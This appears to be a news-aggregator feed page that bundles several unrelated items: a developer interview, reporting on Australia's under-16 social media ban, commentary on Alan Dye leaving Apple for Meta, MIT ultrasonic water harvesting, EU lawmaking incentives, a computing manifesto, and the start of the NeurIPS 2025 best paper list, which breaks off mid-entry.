I really like the idea of fixing a bug in multiple ways to really see what's needed. How do you determine whether something is the proper fix or not?

Sometimes the code just "feels right" or someone more knowledgeable can tell me. Of course, fixing simple visual errors should not need a ton of changes around the codebase. Changes should be proportional to the bug's difficulty/complexity, but there's no clear answer. It's more a gut feeling.

What inspires you to have an online presence (in irc, commenting, blog posts etc.)? How do you decide when to make a blog post or not?

For blog posts, I ask myself: "Do I need to remember this?" Some are just a note for myself, which others might find useful too.

I once deleted my lobste.rs account because it took up too much time. Now that all my work is remote, I kind of miss coffee-breaks and office chitchat, so I hang about in IRC, Matrix, Fediverse, Lobsters etc. to fill my Sims status bar. I still prefer remote work, but I wouldn't mind hybrid option at times. Also, removing the lobste.rs bookmark stopped me reflexively clicking it.

Due to learning I have ADHD and very likely autism, I have worked on myself (mentally) and internalized that I don't need to constantly go through these sites. Notice the problematic behavior, then cut it out. Whenever I notice I'm stuck in a loop opening and closing the same sites, I've learned to close the web-browser and do something else. The hardest part is actually noticing it.

Do you have any interesting personal tools? I use your colorscheme .

I journal a lot on a remarkable2 tablet when working, writing down what I have done, should do or notes figuring out problems. Writing by hand helps me remember things too. I made an RSS "newspaper" script for my tablet too, which also shows the daily weather now.

I also use todo.txt for tasks, like my own list of bugs and other projects I need to go through. I even wrote an app for it called KomoDo .

Then I use Obsidian for any technical notes and know-how, like programming and computer things that are pain to write by hand.

When did you migrate to codeberg ?

It was even before Github started getting "AI" stuff. I just got tired of Github being a social media site instead of a good platform. SourceHut would have been nice too, I just didn't know of it at the time. I'm also wary of the email workflow, but wouldn't be opposed to learning it.

Teens hoping to get around Australia’s social media ban are rushing to smaller apps. Where are they going?

Guardian
www.theguardian.com
2025-12-05 02:11:23
As Meta begins deleting accounts and the deadline looms, children have already begun to flock to platforms not included in the banned list, like Coverstar, Lemon8, Yope and RednoteAustralia social media ban explained: everything you need to knowGet our breaking news email, free app or daily news pod...
Original Article

As Australia prepares to block under-16s from accessing 10 of its largest social media platforms, less prominent companies have begun courting the teen market – in some cases paying underaged influencers to promote them.

One teenaged TikTok influencer said in a paid “collab” video for the app Coverstar: “The social media ban is fast approaching, but I found the new cool app we can all move to.”

From 10 December all under-16s in Australia will notionally be banned from TikTok, Instagram, Snapchat, YouTube, Reddit, Twitch, Kick and X as Australia’s world-first social media laws come into effect.

Questions remain about how effective the ban will be, with many children hoping to circumvent it. Others have started looking elsewhere for their social media fix.

Sign up: AU Breaking News email

Along with Coverstar, lesser known apps such as Lemon8 and photo-sharing app Yope have skyrocketed on Australia’s download charts in recent weeks, currently ranked first and second in Apple’s lifestyle category respectively.

The government has repeatedly said its ban list is “dynamic”, with the potential for new apps to be added. Experts have raised concerns the government is starting a game of “whack-a-mole”, pushing children and teenagers to lesser known corners of the internet.

“A potential consequence of this legislation is that it might actually inadvertently create more risk for young people,” says Dr Catherine Page Jeffery, an expert in digital media and technological change at the University of Sydney.

“There is a very real possibility that, if young people do migrate to less regulated platforms, they become more secretive about their social media use because they’re not supposed to be on there, and therefore if they do encounter concerning material or have harmful experiences online that they won’t talk to their parents about it.”

Here’s what we know about some of the apps where children are migrating.

Coverstar

The US-based video-sharing platform Coverstar describes itself as a “new kind of social app for Gen Alpha – built for creativity, powered by AI, and safer than TikTok”. The app, which is not covered by the social media ban, sits at number 45 on Apple’s Australian downloads chart.

Screenshot from app called Yope
A screenshot from Yope. The Guardian was able to create an account for a fictional four-year-old named Child Babyface without any requirement for parental permission Photograph: Yope

The video-sharing platform allows children as young as four to livestream, post videos and comment. Users under the age of 13 require a parent to film themselves saying “My name is ____ and I give permission to use Coverstar”, which is then verified by the app. Adults are also free to make an account, post content and interact in the comments sections.

Like TikTok and Instagram, users can spend real money to buy virtual “gifts” to send to creators who go live, and the app also includes a “premium” paid subscription with advanced features.

Coverstar advertises its safety features as a lack of direct messaging, a strict no-bullying policy and 24/7 monitoring by AI and human moderators.

Dr Jennifer Beckett, an expert in online governance and social media moderation from the University of Melbourne, says Coverstar’s repeated promotion of their use of AI raises some questions.

“They are really spruiking that they use [AI] a lot, and it’s not great,” she says.

AI has been widely used in social media moderation for years, however Beckett says it has significant limitations.

“It is not nuanced, it is not contextual. It’s why you have a layer of humans on the top. The question is: how many humans do they have?”

Coverstar has been contacted for comment.

Lemon8

Lemon8, an Instagram-esque photo and video-sharing app owned by TikTok’s parent company, ByteDance, has boomed in popularity in recent weeks.

Users can connect a TikTok account, allowing them to seamlessly transport video content over to Lemon8. They can also re-follow all their favourite TikTok accounts on the new platform with a single tap.

However, on Tuesday Australia’s eSafety commissioner, Julie Inman Grant, announced that her office had written to Lemon8, recommending it self-assess to determine if the new laws apply to it.

Yope

With only 1,400 reviews on the Apple app store, Yope is a “friend-only private photo messaging app” that has been floated as a post-ban alternative to Snapchat.

skip past newsletter promotion

Yope’s cofounder and chief executive, Bahram Ismailau, described the operation as “a small team of a few dozen people building the best space for teens to share photos with friends”.

Similar to Lemon8, Australia’s eSafety commissioner said she had written to Yope advising them to self assess. Ismailau told the Guardian he had not received any correspondence, however was “ready to provide our official position on the overall eSafety policy regarding age-restricted social media platforms”.

He said that after conducting a self-assessment Yope believes it fully meets the exemption in the law that excludes apps that are solely or primarily designed for messaging, emailing, video or voice calling.

Australian government adds Reddit and Kick to under-16s social media ban – video

“Yope is a photo messenger with no public content,” Ismailau said. “Yope is fundamentally as safe as iMessage or WhatsApp.”

Yope’s website states the app is for users aged over 13, and those between 13 and 18 “may use the app only with the involvement of a parent or guardian”. However the Guardian was able to create an account for a fictional four-year-old named Child Babyface without any requirement for parental permission.

A mobile phone number is required to create an account.

Ismailau did not directly respond to questions about the under-13s account, however he noted the team was planning to update their privacy policy and terms of use within the next week to “better reflect how the app is actually used and who it’s intended for”.

Rednote

Also known as Xiaohongshu, this Chinese video-sharing app was the destination of choice for Americans during TikTok’s brief ban in the US earlier this year.

Beckett said the app may be a safe place to go. “They have much stronger regulations on social media in China – and we see that reflected in the kinds of content that has to be moderated,” she says. “So I would almost say if you’re going to go somewhere, it’s probably the safest place to go.

“It’s not without its trials and tribulations because we know on TikTok, even when it was still in Bytedance’s control, there was so much pro-ana [anorexia] content.”

However, cybersecurity experts say the app collects extensive personal data, which it can share with third-party platforms or may be compelled by law to share with the Chinese government.

Even with an ever-expanding list of banned social media sites, experts say the government is underestimating children’s desire to use social media – and their creativity when it comes to finding a way.

“I don’t think we give them enough credit for how smart they are,” Beckett says. “Kids are geniuses when it comes to pushing boundaries.”

Anecdotally, the Guardian understands some children have been discussing using website builders to create their own forums and chat boards. Others have suggested chatting via a shared Google Doc if texting isn’t an option for them.

“They’re going to get around it,” Beckett said. “They’ll figure it out.”

★ Alan Dye Was in Tim Cook’s Blind Spot

Daring Fireball
daringfireball.net
2025-12-05 01:53:12
How could someone who would even *consider* leaving Apple for Meta rise to a level of such prominence at Apple, including as one of the few public faces of the company?...
Original Article

NBC News, back in March 2018 :

Speaking at a town hall event hosted by MSNBC’s Chris Hayes and Recode’s Kara Swisher, Cook said Facebook put profits above all else when it allegedly allowed user data to be taken through connected apps. [...]

When asked what he would do if he were in Zuckerberg’s position, Cook replied: “What would I do? I wouldn’t be in this situation.”

“The truth is we could make a ton of money if we monetized our customer, if our customer was our product,” Cook said. “We’ve elected not to do that.”

“Privacy to us is a human right. It’s a civil liberty, and something that is unique to America. This is like freedom of speech and freedom of the press,” Cook said. “Privacy is right up there with that for us.”

Perhaps Cook now needs to define “us”.

This was a rather memorable interview. Cook’s “What would I do? I wouldn’t be in this situation” is one of the stone-coldest lines he’s ever zinged at a rival company. (In public, that is.) That was just ice cold. Cook is a consummate diplomat. Most non-founder big company CEOs are. Satya Nadella, Sundar Pichai, Andy Jassy — none of them are known for throwing shade, let alone sharp elbows, at competitors. Cook has made an exception, multiple times , when it comes to Facebook/Meta (and to a lesser degree, Google).

So it’s not just that Alan Dye jumped ship from Apple for the chief designer officer role at another company. 1 It’s not just that he left for a rival company. It’s that he left Apple for Meta , of all companies. Given what Cook has said about Meta publicly, one can only imagine what he thinks about them privately. Apple executives tend to stay at Apple. The stability of its executive team is unparalleled. But Dye is a senior leader who not only left for a rival, but the one rival that Cook and the rest of Apple’s senior leadership team consider the most antithetical to Apple’s ideals.

It would have been surprising if Dye had jumped ship to Google or Microsoft. It would have been a little more surprising if he’d left for Amazon, if only because Amazon seemingly places no cultural value whatsoever on design, as Apple practices it. But maybe with Amazon it would have been seen as Andy Jassy deciding to get serious about design, and thus, in a way, less surprising after the fact. But leaving Apple for Meta , of all companies, feels shocking. How could someone who would even consider leaving Apple for Meta rise to a level of such prominence at Apple, including as one of the few public faces of the company ?

So it’s not just that Alan Dye is a fraud of a UI designer and leader, and that Apple’s senior leadership had a blind spot to the ways Dye’s leadership was steering Apple’s interface design deeply astray. That’s problem enough, as I emphasized in my piece yesterday . It’s also that it’s now clear that Dye’s moral compass was not aligned with Apple’s either. Tim Cook and the rest — or at least most? — of Apple’s senior leadership apparently couldn’t see that, either.

Ultrasonic device dramatically speeds harvesting of water from the air

Hacker News
news.mit.edu
2025-12-05 01:47:45
Comments...
Original Article

Feeling thirsty? Why not tap into the air? Even in desert conditions, there exists some level of humidity that, with the right material, can be soaked up and squeezed out to produce clean drinking water. In recent years, scientists have developed a host of promising sponge-like materials for this “atmospheric water harvesting.”

But recovering the water from these materials usually requires heat — and time. Existing designs rely on heat from the sun to evaporate water from the materials and condense it into droplets. But this step can take hours or even days.

Now, MIT engineers have come up with a way to quickly recover water from an atmospheric water harvesting material. Rather than wait for the sun to evaporate water out, the team uses ultrasonic waves to shake the water out.

The researchers have developed an ultrasonic device that vibrates at high frequency. When a water-harvesting material, known as a “sorbent,” is placed on the device, the device emits ultrasound waves that are tuned to shake water molecules out of the sorbent. The team found that the device recovers water in minutes, versus the tens of minutes or hours required by thermal designs.

Unlike heat-based designs, the device does require a power source. The team envisions that the device could be powered by a small solar cell, which could also act as a sensor to detect when the sorbent is full. It could also be programmed to automatically turn on whenever a material has harvested enough moisture to be extracted. In this way, a system could soak up and shake out water from the air over many cycles in a single day.

“People have been looking for ways to harvest water from the atmosphere, which could be a big source of water particularly for desert regions and places where there is not even saltwater to desalinate,” says Svetlana Boriskina, principal research scientist in MIT’s Department of Mechanical Engineering. “Now we have a way to recover water quickly and efficiently.”

Boriskina and her colleagues report on their new device in a study appearing today in the journal Nature Communications . The study’s first author is Ikra Iftekhar Shuvo, an MIT graduate student in media arts and sciences, along with Carlos Díaz-Marín, Marvin Christen, Michael Lherbette, and Christopher Liem.

Precious hours

Boriskina’s group at MIT develops materials that interact with the environment in novel ways. Recently, her group explored atmospheric water harvesting (AWH), and ways that materials can be designed to efficiently absorb water from the air. The hope is that, if they can work reliably, AWH systems would be of most benefit to communities where traditional sources of drinking water — and even saltwater — are scarce.

Like other groups, Boriskina’s lab had generally assumed that an AWH system in the field would absorb moisture during the night, and then use the heat from the sun during the day to naturally evaporate the water and condense it for collection.

“Any material that’s very good at capturing water doesn’t want to part with that water,” Boriskina explains. “So you need to put a lot of energy and precious hours into pulling water out of the material.”

She realized there could be a faster way to recover water after Ikra Shuvo joined her group. Shuvo had been working with ultrasound for wearable medical device applications. When he and Boriskina considered ideas for new projects, they realized that ultrasound could be a way to speed up the recovery step in atmospheric water harvesting.

“It clicked: We have this big problem we’re trying to solve, and now Ikra seemed to have a tool that can be used to solve this problem,” Boriskina recalls.

Water dance

Ultrasound, or ultrasonic waves, are acoustic pressure waves that travel at frequencies of over 20 kilohertz (20,000 cycles per second). Such high-frequency waves are not visible or audible to humans. And, as the team found, ultrasound vibrates at just the right frequency to shake water out of a material.

“With ultrasound, we can precisely break the weak bonds between water molecules and the sites where they’re sitting,” Shuvo says. “It’s like the water is dancing with the waves, and this targeted disturbance creates momentum that releases the water molecules, and we can see them shake out in droplets.”

Shuvo and Boriskina designed a new ultrasonic actuator to recover water from an atmospheric water harvesting material. The heart of the device is a flat ceramic ring that vibrates when voltage is applied. This ring is surrounded by an outer ring that is studded with tiny nozzles. Water droplets that shake out of a material can drop through the nozzle and into collection vessels attached above and below the vibrating ring.

They tested the device on a previously designed atmospheric water harvesting material. Using quarter-sized samples of the material, the team first placed each sample in a humidity chamber, set to various humidity levels. Over time, the samples absorbed moisture and became saturated. The researchers then placed each sample on the ultrasonic actuator and powered it on to vibrate at ultrasonic frequencies. In all cases, the device was able to shake out enough water to dry out each sample in just a few minutes.

The researchers calculate that, compared to using heat from the sun, the ultrasonic design is 45 times more efficient at extracting water from the same material.

“The beauty of this device is that it’s completely complementary and can be an add-on to almost any sorbent material,” says Boriskina, who envisions a practical, household system might consist of a fast-absorbing material and an ultrasonic actuator, each about the size of a window. Once the material is saturated, the actuator would briefly turn on, powered by a solar cell, to shake out the water. The material would then be ready to harvest more water, in multiple cycles throughout a single day.

“It’s all about how much water you can extract per day,” she says. “With ultrasound, we can recover water quickly, and cycle again and again. That can add up to a lot per day.”

This work was supported, in part, by the MIT Abdul Latif Jameel Water and Food Systems Lab and the MIT-Israel Zuckerman STEM Fund.

This work was carried out in part by using MIT.nano and ISN facilities at MIT.

Brussels writes so many laws

Hacker News
www.siliconcontinent.com
2025-12-05 01:39:24
Comments...
Original Article

The central puzzle of the EU is its extraordinary productivity. Grand coalitions, like the government recently formed in Germany, typically produce paralysis. The EU’s governing coalition is even grander, spanning the center-right EPP, the Socialists, the Liberals, and often the Greens, yet between 2019 and 2024, the EU passed around 13,000 acts, about seven per day. The U.S. Congress, over the same period, produced roughly 3,500 pieces of legislation and 2,000 resolutions. 1

Not only is the coalition broad, but encompasses huge national and regional diversity. In Brussels, the Parliament has 705 members from roughly 200 national parties. The Council represents 27 sovereign governments with conflicting interests. A law faces a double hurdle, where a qualified majority of member states and of members of parliament must support it. The system should produce gridlock, more still than the paralysis commonly associated with the American federal government. Yet it works fast and produces a lot, both good and bad. The reason lies in the incentives: every actor in the system is rewarded for producing legislation, and not for exercising their vetoes.

Understanding the incentives

The Commission initiates legislation, but it has no reason to be reticent. It cannot make policy by announcing new spending commitments and investments, as the budget is tiny, around one percent of GDP, and what little money it has is mostly earmarked for agriculture (one-third) and regional aid (one-third). In Brussels, policy equals legislation. Unlike national civil servants and politicians, civil servants and politicians who work in Brussels have one main path to build a career: passing legislation.

Legislation is valuable to the Commission, as new laws expand Commission competences, create precedent, employ more staff, and justify larger budgets. The Commission, which is indirectly elected and faces little pressure from voters, has no institutional interest in concluding that EU action is unnecessary, that existing national rules suffice, or that a country already has a great solution and others should simply learn from it.

The formal legislative process was designed to work through public disagreement, with each institution’s amendments debated and voted on in open session. The Commission proposes the text. Parliament debates and amends it in public. The Council reviews it and can force changes. If they disagree, the text bounces back and forth. If the deadlock persists, a joint committee attempts to force a compromise before a final vote. Each stage requires a full majority. Contentious laws took years.

This slow process changed in stages. The Amsterdam Treaty (1999) allowed Parliament and Council to adopt laws at the First Reading if an agreement was reached early. Initially, this was exceptional, but by the 2008 financial crisis, speed became a priority. The Barroso Commission argued that EU survival required rapid response, and it deemed sequential public readings too slow.

The trilogues became the solution after a formal “declaration” in 2007, though the Treaties never mention them. Instead of public debate, representatives from the Parliament, Council, and Commission meet privately to agree on the text. They work from a “four-column document.” The first three columns list the starting positions of each institution, the fourth column contains the emerging law. The Commission acts as the “pen-holder” for this fourth column. This gives them immense power: by controlling the wording of the compromise, they can subtly exclude options they dislike.

Because these meetings are informal, they lack rules on duration or conduct. Negotiators often work in “marathon” sessions that stretch until dawn to force a deal. The final meeting for the AI Act, for instance, lasted nearly 38 hours . This physical exhaustion leads to drafting errors. Ministers and MEPs, desperate to finish, agree to complex details at 4:00 a.m. that they have not properly read. By the time the legislation reaches the chamber floor, the deal is done, errors and all. 2

Image
Final agreement of the Trilogue for the Recovery and Reconstruction Facility (Regulation (EU) 2021/241). Early morning hours of December 18, 2020. Left-to-right: Garicano (Renew), Boeslager (Greens), van Overvelt (ECR), Muresan (EPP), Clauss (German Council Presidency), Dombrovskis (EU Commission), Tinagli (S&D), García (S&D), Pislaru (Renew).

The European Parliament is the institution that is accountable to the voters. But it is the parliamentary committees, and their ideology, that matter, not the plenary or the political parties to which MEPs belong. Those who join EMPL, which covers labor laws, want stronger social protections. Those who join ENVI want tougher climate rules.

The committee coordinator for each political group appoints one MEP to handle the legislative file: the Rapporteur for the lead group, Shadow Rapporteurs for the others. These five to seven people negotiate the law among themselves, nominally on behalf of their groups. In practice, no one outside the committee has any say.

When the negotiating team reaches an agreement (normally, a grand coalition of the centrist groups), they return to the full committee. The committee in turn usually backs the deal, given that the rapporteurs who made it represent a majority in the committee, and the committee self-selects based on ideology.

Crucially, the rapporteurs then present the deal to their political groups as inevitable, based on the tenuous majority of the centrist coalition that governs Europe. “This is the best compromise we can get,” the rapporteur invariably announces. “Any amendment will cause the EPP/Greens/S&D/Renew to drop the deal.”

Groups face pressure for a simple up-or-down vote, and often prefer to claim a deal than doing nothing. MEPs who refuse to support the deal may be branded as troublemakers and risk losing support on their own files in the future.

Often just a couple of weeks after the committee vote, the legislation reaches the full Parliament to obtain a mandate authorizing trilogue negotiations, with little time for the remaining MEPs to grasp what is happening.

The dynamic empowers a small committee majority to drive major policy change. For example, in May 2022, the ENVI committee (by just 6 votes) approved a mandate to cut by 100% CO₂ emissions from new cars by 2035. De facto, this bans new petrol and diesel cars from that date.

Less than four weeks later, in June 2022, Parliament rubber stamped that position as its official negotiating mandate, with a “Ferrari” exception for niche sports cars. This four weeks left almost no time to debate, consult national delegations, or reconsider the committee’s position. From that slim committee vote, the EU proceeded toward an historic shift to electric vehicles continent-wide.

Similarly, the EMPL committee approved, in November 2021, the Directive on Adequate Minimum Wages, even though Article 153(5) of the Treaty on the Functioning of the EU explicitly excludes “pay” from the EU’s social policy competences. Co-Rapporteurs Dennis Radtke (center-right EPP) and Agnes Jongerius (center-left S&D) formed a tight alliance and gained a majority in committee, sidelining fierce opposition from countries like Denmark and Sweden that wished to protect their national wage-bargaining systems.

The committee’s text was rushed to plenary and adopted as Parliament’s position fourteen days later (in late November). The system let a committee majority deliver a law the Court of Justice ruled partially illegal in November 2025 precisely at the request of the Nordic states, striking down Article 5(2) on criteria for setting minimum wages.

The player you’d expect to check any excesses is the Council of Ministers from the member states, which represents national governments. But the way the Council participates in the drafting dilutes this check. The Council is represented by the country holding the rotating Presidency, which changes every six months. Each Presidency comes in with a political agenda and a strong incentive to succeed during its short tenure. With a 13-year wait before that member state will hold it again, the Presidency is under pressure to close deals quickly, especially on its priority files, to claim credit. This can make the Council side surprisingly eager to compromise and wrap things up, even at the cost of making more concessions than some member states would ideally like.

The Commission presents itself as a neutral broker during the trilogue process. It is not. By controlling the wording of the draft agreement (“Column four”), the Commission can subtly exclude options misaligned with its preferences. It knows the dossiers inside out and can use its institutional memory to its advantage. Commission services analyze positions of key MEPs and Council delegations in advance, triangulating deals that preserve core objectives.

The Commission also exploits the six-month presidency rotation. Research shows it strategically delays proposals until a Member State with similar preferences takes over. 3 As the six-month Presidency clock winds down, the Council’s willingness to make concessions often increases. No country wants to hand off an unfinished file to the next country, if it can avoid it. The Commission, aware of this, often pushes for marathon trilogues right before deadlines or the end of a Presidency to extract the final compromises.

As legislation has grown more technical, elected officials have grown more reliant on their staff. Accredited Parliamentary Assistants (APAs) to MEPs, as well as political group advisers and Council attachés, play a large role. These staffers have become primary drafters of amendments and key negotiators representing their bosses in “technical trilogues”, where substantial political decisions are often disguised as technical adjustments. 4

COVID-19 accelerated this. Physical closure increased reliance on written exchanges and remote connections, favoring APAs and the permanent secretariats of Commission, Parliament, and Council. The pandemic created a “Zoom Parliament” where corridor conversations, crucial to coalition-building among MEPs, disappeared. In my experience, they did not fully return after the pandemic. This again greatly strengthened the hand of the Commission.

Quantity without quality

The result of this volume bias in the system is an onslaught of low-quality legislation. Compliance is often impossible. A BusinessEurope analysis cited by the Draghi report looked at just 13 pieces of EU legislation and found 169 cases where different laws impose requirements on the same issue. In almost a third of these overlaps, the detailed requirements were different, and in about one in ten they were outright contradictory.

Part of the problem is the lack of feedback loops and impact assessment at the aggregate level. The Commission’s Standard Cost Model for calculating regulatory burdens varies in application across files. Amendments introduced by Parliament or Council are never subject to cost-benefit analysis. No single methodology assesses EU legislation once transposed nationally. Only a few Member States systematically measure a transposed law’s impact. The EU has few institutionalized mechanisms to evaluate whether a given piece of legislation actually achieved its objectives. Instead, the Brussels machinery tends to simply move on to the next legislative project.

Brussels’ amazing productivity doesn’t make sense if you look at how the treaties are written, but it is obvious once you understand the informal incentives facing every relevant player in the process. Formally, the EU is a multi-actor system with many veto points (Commission, Parliament, Council, national governments, etc.), which should require broad agreement and hence slow decision making. In practice, consensus is manufactured in advance rather than reached through deliberation.

By the time any proposal comes up for an official vote, most alternatives have been eliminated behind closed doors. A small team of rapporteurs agrees among themselves; the committee endorses their bargain; the plenary, in turn, ratifies the committee deal; and the Council Presidency, pressed for time, accepts the compromise (with both Council and Parliament influenced along the way by the Commission’s mediation and drafting). Each actor can thus claim a victory and no one’s incentive is to apply the brakes.

This “trilogue system” has proven far more effective at expanding the scope of EU law than a truly pluralistic, many-veto-player system would be. In the EU’s political economy, every success and every failure leads to “more law,” and the system is finely tuned to deliver it.

Share

The Resonant Computing Manifesto

Simon Willison
simonwillison.net
2025-12-05 01:19:26
The Resonant Computing Manifesto Launched today at WIRED’s The Big Interview event, this manifesto (of which I'm a founding signatory) pushes for a positive framework for thinking about building hyper-personalized AI-powered software. This part in particular resonates with me: For decades, technolo...
Original Article

The Resonant Computing Manifesto . Launched today at WIRED’s The Big Interview event, this manifesto (of which I'm a founding signatory) pushes for a positive framework for thinking about building hyper-personalized AI-powered software.

This part in particular resonates with me:

For decades, technology has required standardized solutions to complex human problems. In order to scale software, you had to build for the average user, sanding away the edge cases. In many ways, this is why our digital world has come to resemble the sterile, deadening architecture that Alexander spent his career pushing back against.

This is where AI provides a missing puzzle piece. Software can now respond fluidly to the context and particularity of each human—at scale. One-size-fits-all is no longer a technological or economic necessity. Where once our digital environments inevitably shaped us against our will, we can now build technology that adaptively shapes itself in service of our individual and collective aspirations.

There are echos here of the Malleable software concept from Ink & Switch.

The manifesto proposes five principles for building resonant software: Keeping data private and under personal stewardship, building software that's dedicated to the user's interests, ensuring plural and distributed control rather than platform monopolies, making tools adaptable to individual context, and designing for prosocial membership of shared spaces.

Steven Levy talked to the manifesto's lead instigator Alex Komoroske and provides some extra flavor in It's Time to Save Silicon Valley From Itself :

By 2025, it was clear to Komoroske and his cohort that Big Tech had strayed far from its early idealistic principles. As Silicon Valley began to align itself more strongly with political interests, the idea emerged within the group to lay out a different course, and a casual suggestion led to a process where some in the group began drafting what became today’s manifesto. They chose the word “resonant” to describe their vision mainly because of its positive connotations. As the document explains, “It’s the experience of encountering something that speaks to our deeper values.”

NeurIPS best paper awards 2025

Hacker News
blog.neurips.cc
2025-12-05 01:15:42
Comments...
Original Article

The Best Paper Award Committee members were nominated by the Program Chairs and the Database and Benchmark track chairs, who selected leading researchers across machine learning topics. These nominations were approved by the General Chairs and Next Generation and Accessibility Chairs.

The best paper award committees were tasked with selecting a handful of highly impactful papers from the Main Track and the Datasets & Benchmark Track of the conference.

With that, we are excited to share the news that the best and runner-up paper awards this year go to seven groundbreaking papers, including four best papers (one of which is from the datasets and benchmarks track) and three runner-ups. The seven papers highlight advances in diffusion model theory, self-supervised reinforcement learning, attention mechanisms for large language models, reasoning capabilities in LLMs, online learning theory, neural scaling laws, and benchmarking methodologies for language model diversity.

The winners are presented here in alphabetical order by title.

Artificial Hivemind: The Open-Ended Homogeneity of Language Models (and Beyond)

Liwei Jiang , Yuanjun Chai , Margaret Li , Mickel Liu , Raymond Fok , Nouha Dziri , Yulia Tsvetkov , Maarten Sap , Yejin Choi

Abstract

Large language models (LMs) often struggle to generate diverse, human-like creative content, raising concerns about the long-term homogenization of human thought through repeated exposure to similar outputs. Yet scalable methods for evaluating LM output diversity remain limited, especially beyond narrow tasks such as random number or name generation, or beyond repeated sampling from a single model. To address this gap, we introduce Infinity-Chat, a large-scale dataset of 26K diverse, real-world, open-ended user queries that admit a wide range of plausible answers with no single ground truth. We introduce the first comprehensive taxonomy for characterizing the full spectrum of open-ended prompts posed to LMs, comprising 6 top-level categories (e.g., creative content generation, brainstorm & ideation) that further breaks down to 17 subcategories. Using Infinity-Chat, we present a large-scale study of mode collapse in LMs, revealing a pronounced Artificial Hivemind effect in open-ended generation of LMs, characterized by (1) intra-model repetition, where a single model consistently generates similar responses, and more so (2) inter-model homogeneity, where different models produce strikingly similar outputs. Infinity-Chat also includes 31,250 human annotations, across absolute ratings and pairwise preferences, with 25 independent human annotations per example. This enables studying collective and individual-specific human preferences in response to open-ended queries. Our findings show that state-of-the-art LMs, reward models, and LM judges are less well calibrated to human ratings on model generations that elicit differing idiosyncratic annotator preferences, despite maintaining comparable overall quality. Overall, INFINITY-CHAT presents the first large-scale resource for systematically studying real-world open-ended queries to LMs, revealing critical insights to guide future research for mitigating long-term AI safety risks posed by the Artificial Hivemind.

Reflections from the Selection Committee

This paper makes a substantial and timely contribution to the understanding of diversity, pluralism, and societal impact in modern language models. The authors introduce Infinity-Chat, a rigorously constructed benchmark of 26K real-world open-ended queries paired with 31K dense human annotations, enabling systematic evaluation of creative generation, ideation, and subjective preference alignment, dimensions historically underexamined in AI evaluation. Beyond releasing a valuable dataset, the paper provides deep analytical insights through the first comprehensive taxonomy of open-ended prompts and an extensive empirical study across more than 70 models, revealing the Artificial Hivemind effect: pronounced intra- and inter-model homogenization that raises serious concerns about long-term risks to human creativity, value plurality, and independent thinking. The findings expose critical miscalibration between current reward models, automated judges, and diverse human preferences, highlighting the tension between alignment and diversity and establishing a foundation for future work on preserving heterogeneity in AI systems. Overall, this work sets a new standard for datasets and benchmarks that advance scientific understanding and address pressing societal challenges rather than solely improving technical performance.

Gated Attention for Large Language Models: Non-linearity, Sparsity, and Attention-Sink-Free

Zihan Qiu , Zekun Wang , Bo Zheng , Zeyu Huang , Kaiyue Wen , Songlin Yang , Rui Men , Le Yu , Fei Huang , Suozhi Huang , Dayiheng Liu , Jingren Zhou , Junyang Lin

Abstract

Gating mechanisms have been widely utilized, from early models like LSTMs and Highway Networks to recent state space models, linear attention, and also softmax attention. Yet, existing literature rarely examines the specific effects of gating. In this work, we conduct comprehensive experiments to systematically investigate gating-augmented softmax attention variants. Specifically, we perform a comprehensive comparison over 30 variants of 15B Mixture-of-Experts (MoE) models and 1.7B dense models trained on a 3.5 trillion token dataset. Our central finding is that a simple modification—applying a head-specific sigmoid gate after the Scaled Dot-Product Attention (SDPA)—consistently improves performance. This modification also enhances training stability, tolerates larger learning rates, and improves scaling properties. By comparing various gating positions and computational variants, we attribute this effectiveness to two key factors: (1) introducing non-linearity upon the low-rank mapping in the softmax attention, and (2) applying query-dependent sparse gating scores to modulate the SDPA output. Notably, we find this sparse gating mechanism mitigates massive activation, attention sink and enhances long-context extrapolation performance. We also release related codes ( https://github.com/qiuzh20/gated_attention} ) and models ( https://huggingface.co/QwQZh/gated_attention ) to facilitate future research. Furthermore, the most effective SDPA output gating is used in the Qwen3-Next models ( https://huggingface.co/collections/Qwen/qwen3-next ).

Reflections from the Selection Committee

The main finding of this paper is that the performance of large language models using softmax attention can be consistently improved by introducing head-specific sigmoid gating after the scaled dot product attention operation in both dense and mixture-of-experts (MoE) Transformer models. This finding is backed up by more than thirty experiments on different variants of gated softmax attention using 15B MoE and 1.7B dense models trained on large-scale datasets of 400B, 1T, or 3.5T tokens. The paper also includes careful analyses showing that the introduction of the authors’ recommended form of gating improves the training stability of large language models, reduces the “attention sink” phenomenon that has been widely reported in attention models, and enhances the performance of context length extension. The main recommendation of the paper is easily implemented, and given the extensive evidence provided in the paper for this modification to LLM architecture, we expect this idea to be widely adopted. This paper represents a substantial amount of work that is possible only with access to industrial scale computing resources, and the authors’ sharing of the results of their work, which will advance the community’s understanding of attention in large language models, is highly commendable, especially in an environment where there has been a move away from open sharing of scientific results around LLMs.

1000 Layer Networks for Self-Supervised RL: Scaling Depth Can Enable New Goal-Reaching Capabilities

Kevin Wang , Ishaan Javali , Michał Bortkiewicz , Tomasz Trzcinski , Benjamin Eysenbach

Abstract

Scaling up self-supervised learning has driven breakthroughs in language and vision, yet comparable progress has remained elusive in reinforcement learning (RL). In this paper, we study building blocks for self-supervised RL that unlock substantial improvements in scalability, with network depth serving as a critical factor. Whereas most RL papers in recent years have relied on shallow architectures (around 2 — 5 layers), we demonstrate that increasing the depth up to 1024 layers can significantly boost performance. Our experiments are conducted in an unsupervised goal-conditioned setting, where no demonstrations or rewards are provided, so an agent must explore (from scratch) and learn how to maximize the likelihood of reaching commanded goals. Evaluated on simulated locomotion and manipulation tasks, our approach increases performance on the self-supervised contrastive RL algorithm by  — , outperforming other goal-conditioned baselines. Increasing the model depth not only increases success rates but also qualitatively changes the behaviors learned.

Reflections from the Selection Committee
This paper challenges the conventional assumption that the information provided by reinforcement learning (RL) is insufficient to effectively guide the numerous parameters of deep neural networks, hence suggesting that large AI systems be predominantly trained through self-supervision, with RL reserved solely for fine-tuning. The work introduces a novel and easy-to-implement RL paradigm for the effective training of very deep neural networks, employing self-supervised and contrastive RL. The accompanying analysis demonstrates that RL can scale efficiently with increasing network depth, leading to the emergence of more sophisticated capabilities. In addition to presenting compelling results, the study includes several useful analyses, for example, for highlighting the important role of batch size scaling for deeper networks within contrastive RL.

Why Diffusion Models Don’t Memorize: The Role of Implicit Dynamical Regularization in Training

Tony Bonnaire , Raphaël Urfin , Giulio Biroli , Marc Mezard

Abstract

